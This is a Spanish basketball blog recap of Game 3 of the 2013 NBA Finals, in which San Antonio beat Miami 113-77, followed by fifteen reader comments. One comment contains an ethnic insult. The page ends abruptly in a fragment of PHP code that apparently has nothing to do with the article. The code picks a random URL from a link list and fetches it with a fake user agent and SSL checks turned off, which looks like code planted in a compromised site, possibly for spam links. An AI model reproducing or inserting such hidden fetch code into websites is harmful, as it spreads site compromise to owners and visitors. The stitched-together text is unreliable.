La Crónica: La masacre del Álamo

12 de June de 2013 por MagicJohnson32

green nealNi LeBron, Wade & Bosh, ni Duncan, Manu & Parker, el auténtico Big Three del tercer partido de las Finales 2013 fue el formado por Kawhi Leonard, Danny Green & Gary Neal, todo un epítome de la labor que Gregg Popovich y RC Buford vienen realizando al frente de los San Antonio Spurs y que tiene al equipo texano a dos victorias del anillo tras arrasar anoche a los Miami Heat (77-113).

Liderados por la labor de Leonard, soberbio en su defensa sobre LeBron James y cada vez más sólido en ataque, los Spurs dominaron el encuentro de cabo a rabo, jamás fueron por detrás en el marcador, y en la segunda mitad asestaron un mamporrazo a los Heat de los que dejan K.O. a cualquiera, incluidos estos Heat que parecen tan lejos de sus mejores condiciones. Nos preguntamos dónde para aquel LeBron verdaderamente dominante, qué habrá sido de su lanzamiento de media y larga distancia que parecía tan fiable hasta hace unas pocas noches y, en cualquier caso, si esto es todo lo que tiene que ofrecer tras una campaña memorable hasta la fecha por parte del #6. Maniatado por Leonard, incapaz de anotar desde fuera de la pintura, de sacar provecho en transición, de provocar tiros libres ni de generar un juego colectivo a su alrededor, LeBron fue la viva (y gris) imagen de su equipo.

Así, apenas aguantaron los Heat dos asaltos gracias a la buena primera mitad ofensiva de Wade -un desastre atrás, perdiendo continuamente a Danny Green- y a la infalibilidad de Mike Miller en los triples. Tras abortar un primer intento de los Spurs por abrir trecho (32-43) y empatar el partido a 44, los Heat encajaron un parcial de 8-29 que no sería más que el inicio de la masacre en que se convirtió la segunda mitad. Con Gary Neal y Danny Green desatados, metiendo triple tras triple (hasta situar el récord de las Finales en 16), los Spurs fueron hurgando en la herida de los Heat y no se detuvieron hasta el bocinazo final. Los Heat asistieron mudos, paralizados, al divertimento de los texanos. En toda la segunda mitad no hubo rastro de Wade, ni de Bosh; Haslem y Chalmers, tan importantes en noches recientes, ni comparecieron; y LeBron apenas tuvo un arranque, nueve puntos consecutivos coincidiendo con minutos de descanso para Kawhi Leonard, nada que remediase un partido muy preocupante por parte de los vigentes campeones y del MVP, que el jueves afrontarán en situación de jaque el cuarto encuentro de la serie.

Para dicho compromiso es duda Tony Parker, que se tuvo que retirar con molestias musculares y se someterá hoy a una resonancia que determinará si hay lesión o se trata de un calambre. Puede que el devenir de estas Finales dependa de los resultados de esa prueba.

Heat

kawhiPREMIOS

MVP: Premio para un Big Three pero para ninguno de los que nos vienen primero a la cabeza. Danny Green anotó 27 puntos con un 7 de 9 en triples, Gary Neal se fue a los 24 con un 6 de 10 en triples, y el MVP de las Finales hasta el momento, Kawhi Leonard, consiguió 14 puntos, 12 rebotes, 4 robos y desactivó a LeBron James como nadie lo había conseguido en mucho tiempo.

Sorpresa: Hasta ayer, el récord de puntos de Gary Neal en un partido de Playoffs era de 14. Ayer explotó con 6 triples y 24 puntos. En medio de la vorágine tiradora de los Spurs no podemos obviar que Mike Miller anotó los 5 triples que intentó e igualó el récord de triples sin fallo de las Finales establecido por Green hace apenas un par de noches. Otro tirador consumado que esta vez estuvo en el banco perdedor.

Decepción: LeBron James se quedó en 15 puntos tras anotar solo 7 de los 21 tiros que intentó. Los Heat perdieron por 32 puntos mientras él estuvo en cancha, la peor marca de toda su carrera en la NBA.

Esfuerzo en vano: Pocos jugadores de los Heat se pueden salvar del día de ayer. Dwyane Wade y Chris Bosh jugaron una buena primera parte pero se volatilizaron tras el descando. Habrá que quedarse con los 15 puntos sin fallo de Mike Miller.

HIGHLIGHTS

Imágenes | AP Photos / Getty Images

Comenta

15 comentarios a esta entrada

  1. jose_dantley dice:
    #1

    Saliéndome del guión, el esfuerzo en vano se lo daría a McGrady. Sigue sin anotar una canasta el ex-megaestrella.

    La verdad es que parece increíble esa diferencia. Como muy bien apunta Magic, esta victoria aún le da más valor al dúo Popovich/Buford

      Citar

  2. sempren dice:
    #2

    La forma de haber logrado esta victoria me hizo acordarme de las finales de conferencia del año pasado, cuando ya se decía que una de las grandes fortalezas de los Spurs era su amplitud de plantilla, pero que cuando las cosas empezaron a salir mal, dejaron de hacer lo que tan bien habían hecho durante toda la temporada para centrarse en los veteranos.
    Sea porque hayan aprendido la lección, porque los chavales también han progresado, o por lo que sea, lo cierto es que ahí están dando la cara los secundarios del equipo.

    Y no vi el partido, pero supongo que buena parte de los triples habrán sido gracias a la buena distribución de balón de los Spurs, con 14 asistencias para Parker y Ginobili juntos. Dato importante.

    También da la impresión, viendo crónicas y estadísticas, de que ambos entrenadores están ajustando defensas partido a partido, del gran primero de Parker, a un Chalmers atacándolo continuamente en el segundo, que ayer estuvo totalmente desaparecido.

    Miedito con lo motivado que estará el animalico LeBron el próximo partido xD

      Citar

  3. rumbero dice:
    #3

    sempren:
    Y no vi el partido, pero supongo que buena parte de los triples habrán sido gracias a la buena distribución de balón de los Spurs, con 14 asistencias para Parker y Ginobili juntos. Dato importante.

    Movieron bien el balón como suele ser habitual en los Spurs. Todo lo que no metieron en el 1º lo han metido esta madrugada. Y luego estuvo Neal que parecía el jodido R.Miller llegando a línea de tres y metiendo todo lo que se tiraba independientemente de quien tuviera delante.

    Hacía mucho tiempo que no les pasaban por encima de esta manera a los Heat. La segunda parte ha sido un auténtico festival (que ya empezó con los dos triplazos para poner el +6 con el que se han ido al descanso) y es que Miami no ha tenido ningun tipo de respuesta. Ahora, como dice Sempren se intuye que James va a querer quitarse la espina de su mal partido…eso si le deja Leonard. De verdad que me tiene flipado este chaval (21 años). Le está haciendo una defensa que riete tu de la que hizo George. Y sumando en ataque, un crack.

    Veremos como va el cuarto que entre las ganas de Lebron y la posible baja de Parker pinta divertido

      Citar

  4. GreenPride dice:
    #4

    Venganza de la paliza sufrida y los Spurs que se ponen 2-1 a favor y empiezan a mirar al anillo… aunque todavía queda mucha tela por cortar.
    Partido malísimo de los Heat a los que no salió nada de nada. Tras una primera mitad en la que aguantaron como pudieron de la mano de Wade y Bosh y la increible ayuda de Miller, la desaparición de estos a partir del tercer cuarto dió paso a un auténtico baile de los Spurs que acribillaron a los Heat desde el perímetro consiguiendo siempre lanzamientos limpios para sus tiradores y metiendo la quinta cada vez que los Heat perdían la bola.
    Enfrente LeBron intentó echarse el equipo a las espaldas pero fenomenalmente defendido por Leonard tuvo un día para olvidar y arrastró con él al pozo a su equipo, si bien es cierto que tampoco tuvo ninguna ayuda en el segundo tiempo. Increíble ver como se divertía el Big Three de San Antonio viendo desde el banquillo como sus compañeros machacaban a triples a los de Florida.
    Ahora los Heat están contra las cuerdas y hay datos para preocuparse. LeBron no ha pasado de 20 puntos en los tres partidos. Gary Neal lleva más puntos en las Finales que LeBron. Wade y Bosh no parecen en condiciones de dar el apoyo necesario durante todo el partido y los secundarios alternan buenas actuaciones con desapariciones. Los Heat deben endurecer muchísimo su defensa sobre todo exterior (Wade no defiende a nadie) y LeBron debe empezar a marcar diferencias si no quieren que los Spurs acaben con ellos.
    Por los Spurs, deben intentar que ese juego coral en el que todos meten siga teniendo efecto y que su defensa siga parando así de bien a los Heat.
    Y ahora la lesión de Parker. Si bien en este partido no le necesitaron, nadie es tan tonto de pensar que no les va a hacer falta en los próximos. Para los Spurs es necesario contar con el mejor Parker para llevarse el título, así que del grado de su lesión dependerán en gran parte las opciones de los de San Antonio para los próximos partidos…. Esperemos que no sea nada porque sería una lástima que pudieran perder las Finales por ello

      Citar

  5. HisRoyalAirness dice:
    #5

    Si está lesionado Parker la paliza no ha valido la pena.

    Que nadie se confunda, hubo 2 o 3 tiros inverosímiles de Neal pero el resto de las jugadas de 3 puntos fueron un acierto ofensivo en el movimiento de balón de los Spurs o fallos garrafales en defensa de Miami. Y Bonner falló 2 completamente solo, así que podría haber sido aún peor.

    La presencia de Duncan bajo aros fue capital y Leonard en el rebote ofensivo parecía Rodman, qué barbaridad.

    Y a ver si nos dejamos ya de Lebrones y tonterías; han cambiado el sistema por completo, no como el año pasado que era point-forward e y Wade asumía protagonismo. Este año es el clásico Lebron-ball de Mike Brown en el que intento penetrar, si no puedo la boto y cuando quedan 4 segundos y no tengo tiro la suelto o me tiro una piedra. Eso es un caramelo para Popovich.
    Wade está fatal y aún así está promediando en estas Finales 2 puntos menos que James, una asistencia menos y tirando un 10% mejor. A ver si dejamos ya de ponerle verde porque está claro que está lesionado pero el otro está en su mejor momento y no está dando la talla.

    El Este no es el Oeste

      Citar

  6. dunc dice:
    #6

    Muy interesante para ver como están defendiendo los spurs a James en esta serie

    http://hangtime.blogs.nba.com/2013/06/12/film-study-spurs-dare-james-to-shoot-and-he-does-it-poorly/?ls=iref:nbahpt6d

      Citar

  7. Sancho88 dice:
    #7

    Acojonante los Spurs!! menuda orgia desde fuera, cómo han molado. Tirara quien tirara iba dentro, bueno, menos T-Mac, que hubiera sido ya la vorágine. Blair demostrando que debería tener minutos por delante de un Splitter desaparecido en Playoffs (one more time) y los Heat que se borraron al completo. O ganan el cuarto o adios. De momento la predicción de Deer de que ganan los Spurs en seis tiene bastante pinta de ser cierta

      Citar

  8. L.Casei dice:
    #8

    Vaya recital de equipo de los Spurs y del maestro Popovich
    en el control del partido y del juego.
    A ver qué pasa con Parker… Yo aun no veo favorito a SAS… ya se sabe lo que suele pasar tras una victoria aplastante… esperemos que no, hablando desde el punto de vista de San Antonio.

    In Pops we trust.

      Citar

  9. Simon dice:
    #9

    OFF TOPIC: Kidd nuevo entrenador de New Jersey Nets. Sorpreson no???

      Citar

  10. Simon dice:
    #10

    perdón, Brooklyn Nets que me traiciona el subconsciente

      Citar

  11. L.Casei dice:
    #11

    Sorpresón, sí. Apuesta arriesagada pero atractiva.
    Decisiones típicas de estos magnates tipo jeques en el fútbol o Abramovich, se ha liado la manta a la cabeza el Prokhorov…
    Yo sí veo a Kidd como entrenador, pero pasar en cuestión de días más que semanas de jugador a “head coach” de un equipo NBA, y además con aspiraciones…
    Un bautismo de fuego que te puede quemar… o encumbrar. Me recuerda un poco al caso de Avery Johnson, tan cercano en la franquicia de BKN… Pero Kidd tiene muchas más tablas, prestigio y respeto de la Liga que los que tenía el bueno de AJ…
    Lo dicho, hay que verlo al Jason pero buena pinta tiene… Deberá fiarse y asesorarse con algún asistente de más peso y experiencia que los que tiene actualmente.

      Citar

  12. Simon dice:
    #12

    Por cierto Brian Shaw va a ser un eterno asistente o que??? todos los años lo quiere la mitad de la liga como Head Coach y al final siempre termina de asistente, no me lo explico… una pena para él.

      Citar

  13. rumbero dice:
    #13

    Simon:
    Por cierto Brian Shaw va a ser un eterno asistente o que??? todos los años lo quiere la mitad de la liga como Head Coach y al final siempre termina de asistente, no me lo explico… una pena para él.

    Pues sí. Precisamente le leía a Paniagua por Twitter sobre el tema. Se ve que sus “interview skills” son muy flojas, que el tio es muy bueno pero no sabe venderse tan bien, y esto último en un negocio como la NBA es a veces casi más importante. Pero vaya, digo yo que más pronto que tarde lo veremos en algun equipo de head coach.

    Y en el otro lado Kidd que como quien dice no se ha quitado las zapatillas y ya le han dan el mando de los Nets. ¿Se va a llevar bien con Deron no?

      Citar

  14. MagicJohnson32 dice:
    #14

    Kidd puede ser un gran entrenador pero jugársela así con una plantilla veterana me parece un error. Prokhorov no escarmienta con el tema del banquillo.

      Citar

  15. pablo dice:
    #15

    En el tercer partido miami fue humillado con los triples en este cuarto partido no estamos marcando y estan repitiendo la misma humillacion pero esta ves en nuestra cancha, lebrom es un muerto todas las jugadas con el y no aporta en el equipo, todos tienen potencial por algo estan ahi.fuerza miami ginobili es un curepa come gato de mierda wtf ginobilik

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>